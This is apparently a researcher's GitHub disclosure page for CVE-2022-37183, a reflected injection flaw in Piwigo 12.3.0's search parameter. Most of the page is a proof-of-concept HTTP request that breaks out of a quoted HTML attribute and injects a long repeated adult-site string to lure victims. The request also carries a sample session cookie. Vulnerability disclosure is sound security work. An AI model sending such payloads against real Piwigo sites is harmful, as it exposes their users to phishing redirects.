CVE-2022-37183: CVE-nu11secur1ty/vendors/Piwigo/2022/12.3.0 at main · nu11secur1ty/CVE-nu11secur1ty

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

GET /piwigo/index.php?/search/4863/created-monthly-list%22%3Ehttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcom%3CYZxWX%3E HTTP/1.1 Host: pwned_host.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: pwg_id=hctfqtab45adhogo2suhq2mr0c; ssc_phoneSwap=0 Upgrade-Insecure-Requests: 1